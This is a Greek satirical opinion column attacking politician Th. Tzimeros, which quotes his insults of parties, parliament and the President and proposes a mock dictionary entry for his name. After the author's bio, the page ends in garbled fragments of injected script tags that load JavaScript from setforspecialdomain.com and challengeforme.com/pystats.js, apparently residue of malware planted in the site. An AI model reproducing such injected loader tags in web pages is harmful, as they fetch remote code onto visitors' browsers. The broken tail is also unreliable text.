Ήμερος και Τζήμερος… Χρήστος Γιαννίμπας

Αντιγράφω από το Λεξικό του Γ. Μπαμπινιώτη (Β’ έκδοση 2006, σελ. 730). «Ήμερος: 1. (για ζώα) αυτός που έχει εξημερωθεί, κατοικίδιος. 2. (για φυτά) (α) αυτός που δεν φυτρώνει ούτε αναπτύσσεται σε άγρια κατάσταση, αλλά καλλιεργείται από τον άνθρωπο. (β) αυτός που μπορεί να καταναλωθεί από άνθρωπο ή ζώο για τροφή. 3. (για τόπο) αυτός που έχει καλλιεργηθεί, που έχει δεχθεί την επέμβαση του ανθρώπου. 4. αυτός που χαρακτηρίζεται από πραότητα , ηπιότητα.»

Δεν ξέρω αν ετυμολογικά το επίθετο «τζήμερος» προέρχεται από το «ήμερος». Αν όντως προέρχεται, τότε σίγουρα ο γλωσσοπλάστης δεν θα είχε υπόψη του κάποιον σαν τον σημερινό Θ. Τζήμερο. Κι αυτό γιατί ο Τζήμερος προφανώς δεν είναι τίποτε από τα παραπάνω. Επειδή όμως στο λεξικό δεν βρήκα λήμμα «τζήμερος/η/ο», σκέφτομαι να προτείνω στον κ. Μπαμπινιώτη να το συμπεριλάβει σε μια επόμενη έκδοση. Για την ερμηνεία του λήμματος θα μπορούσε να λάβει υπόψη του κάποια από τα παρακάτω που έχουν γραφτεί και ειπωθεί από τον Θ. Τζήμερο.

Για του Βουλευτές και αρχηγούς των κομμάτων:
«Οι «νονοί» των συμμοριών στις οποίες ανήκουν οι βουλευτές, οι αρχηγοί δηλαδή των κομμάτων»
«Κουτοπονηριές, τα λαμόγια, μια ζωή»
«Πόσο ξεδιάντροποι μπορούν να είναι!»
«Το σπιθαμιαίο ηθικό τους ανάστημα φυσικά δεν προέκυψε τώρα»
«Δεν ζητάμε να παραιτηθούν. … Καμμία Μαφία δεν αποφάσισε ποτέ, οικεία βουλήσει, να γίνει ηθική.»
«Η επιμονή των κοινοβουλευτικών συμμοριών εξουσίας»
«Η κομματική Μαφία θα επιτίθεται ληστεύοντας τα πάντα»
«Οι αισχροί αμοραλιστές της κυβερνητικής συμμορίας»
«Οι πολιτικοί μας ΕΙΝΑΙ και αναξιόπιστοι καιαπατεώνες»
«Tι περιμένουμε για να τους εξαφανίσουμε;»

Αν αναρωτιέστε από πού; Γράφει: «από προσώπου γης». Εντάξει, θα μπορούσε να προτείνει και την πιο παραγωγική «λύση» να τους κάνουμε σαπούνι. Έτσι θα καλύπταμε κι ένα μέρος του χρέους. Σημειώστε πως ποτέ δεν εξαίρεσε κάποιον ή κάποιους και πως οι χαρακτηρισμοί δεν είναι σε εισαγωγικά. Ίσως γιατί κυριολεκτεί. Επιπλέον δεν είναι προφορικός λόγος που μπορεί να ξεφύγει και κάτι. Είναι άρθρα που τα διαβάζεις και τα διορθώνεις πριν τα δημοσιοποιήσεις.

Σε συνέντευξή του στην ΕΤ1, μας λέει για τα άλλα κόμματα.

Για την αριστερά: «Η ποιο αισχρή συντήρηση είναι. Τα απολιθώματα του σταλινικού μουσείου της Αλέκας, τους κουτσαβακισμούς και τις τζάμπα μαγκιές του Τσίριζα και το άοσμο και άγευστο ευχολόγιο του Κουβέλη. Θα ήταν όλοι τους γραφικοί αν δεν ήταν επικίνδυνοι.»

Για το πόσα είναι τα ακροδεξιά κόμματα στην Ελλάδα και ποια; «Σίγουρα εκτός από τους υμνητές του Στάλιν και εν μέρει ο ΣΥΡΙΖΑ, το ΛΑΟΣ δεν είναι ακροδεξιό. Το θεωρώ ασόβαρο. Οι Ανεξάρτητοι Έλληνες είναι ένα εθνικιστικό κόμμα το οποίο επίσης είναι αστείο. Δεν μπορώ να το χαρακτηρίσω κάπως αυτό το κόμμα. Είναι ένα κόμμα εφηβικού συναισθηματισμού και ανάλογης σοβαρότητας.»
Για τη ΝΔ: «Η ΝΔ είναι ένα παντελώς αναξιόπιστο κόμμα».

Κατά τα λοιπά : «Είμαστε υπέρ των συνεργασιών σε όλο το πολιτικό φάσμα στη βάση ιδεολογιών και κοινών στόχων». Και σε άρθρο του: «Από τη μια θέλουμε να επικρατήσουν οι απόψεις μας …, κι από την άλλη επιδιώκουμε να εγκαθιδρυθεί στη χώρα ένας πολιτικός πολιτισμός που σέβεται την οπτική του άλλου». Προφανώς όταν τάσσεται «υπέρ των συνεργασιών σε όλο το πολιτικό φάσμα», εννοεί από τον Τζήμερο μέχρι και τον Τζήμερο. Μιλάμε για πολλά καντάρια με «πολιτικό πολιτισμό» και σεβασμό στην «οπτική του άλλου».

Για τη Βουλή (στην οποία πασχίζει να μπει): «Όχι μόνο τους συγκεκριμένους βουλευτές αλλά ολόκληρη την κεντρική «φαμίλια» της συμμορίας, δηλαδή την Βουλή».

Για τον Πρόεδρο της Δημοκρατίας (ως πρόσωπο): «Ο Πρόεδρος της Δημοκρατίας είναι μια θλιβερή, παχυλότατα αμοιβόμενη, καρικατούρα, που γελοιοποιεί το θεσμό».

Βεβαίως, ακόμα και ο Τζήμερος δικαιούται να υπερβεί τον εαυτόν του. Έτσι για όσους τυχόν αναρωτιούνται γιατί όλοι οι πολιτικοί από το 74 μέχρι σήμερα είναι «λαμόγια, κλέφτες, μαφία, συμμορίτες, απατεώνες, αισχροί αμοραλιστές, …» και όλο το κακό συναπάντημα, ο Τζήμερος έχει την απάντηση: «διότι έτσι εγεννήθησαν». Τι νομίζατε; Πως έπεσαν μικροί από το γάιδαρο ή πέρασαν ανεμοβλογιά; Όχι βέβαια. «ΕΤΣΙ ΕΓΕΝΝΗΘΗΣΑΝ».

Όταν πρωτοδιάβασα σε κάποιο site άρθρο του Τζήμερου έγραψα ένα ανάλογο σημείωμα. Ο Τζήμερος βέβαια δεν μου απάντησε αλλά το έκανε ο κ. Α. Βερούτης μόνιμος αρθρογράφος (του site) και μετέπειτα υποψήφιος βουλευτής στο κόμμα του. Μου έγραψε: «Δεν ξέρω αν γεννήθηκαν έτσι, …», «δεν ξέρω και αν ο άνθρωπος γεννιέται με τάσεις στην κλεψιά ή την λαμογιά, διότι δεν είμαι ψυχολόγος».

Βεβαίως οι μη Άριοι αυτού του πλανήτη ξέρουν και μάλιστα από παιδάκια. Αυτοί για να μην τρέχουν σε ψυχολόγους θα μπορούσαν να καλέσουν το πνεύμα του Αδόλφου να τους πει αν «αν γεννήθηκαν έτσι» ή «αν ο άνθρωπος γεννιέται με τάσεις στην κλεψιά ή την λαμογιά». Ακόμα και να ρωτήσουν κάποιον από την ΧΑ (Μιχαλολιάκο, Κασιδιάρη, κ.λπ.). Για την οποία ο Τζήμερος γράφει: «Οι ΧΑ κατηγορούνται για σύσταση εγκληματικής οργάνωσης. Έχουν καταδικαστεί; Όχι! Δεν ισχύει στην περίπτωσή τους το τεκμήριο της αθωότητας;».

Το τελευταίο, μέχρι το επόμενο, «κατόρθωμα» του Τζήμερου ήταν στην εκπομπή του Μπογδάνου στον ΣΚΑΪ, όπου για την υπόθεση των γερμανικών αποζημιώσεων είπε πως: «ξαναφέρνει τα φαντάσματα της Ευρώπης στο προσκήνιο. Είναι μια εξαιρετικά επικίνδυνη ελαφρότητα στην αντιμετώπιση ενός ευρύτατου ζητήματος και γίνεται για εσωτερική κατανάλωση. Ο κ. Τσίπρας μιμείται την τακτική του Χίτλερ.»

Εν κατακλείδι, επειδή η γλώσσα είναι ένα ζωντανός οργανισμός, νομίζω πως ο κ. Μπαμπινιώτης έχει αρκετό υλικό για να προσθέσει και να αποδώσει με πληρότητα το νέο λήμμα «τζήμερος/η/ο». Να μάθουμε να το χρησιμοποιούμε σωστά. Παράδειγμα. Πρόσφατα 42 άτομα συνυπέγραψαν κείμενο με τίτλο «Η αξιοπρέπεια της χώρας προσβάλλεται». Ανάμεσά τους και ο Θ. Τζήμερος (οποία έκπληξη). Αν όλους αυτούς τους αποκαλέσω τζήμερους, τους προσβάλλω ή τους βρίζω; Γιατί δεν θέλω να τους προσβάλλω ή να τους βρίσω. Αυτό το κάνουν μόνοι τους.

*Ο Χρήστος Γιαννίμπας είναι αρθρογράφος και συγγραφέας.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >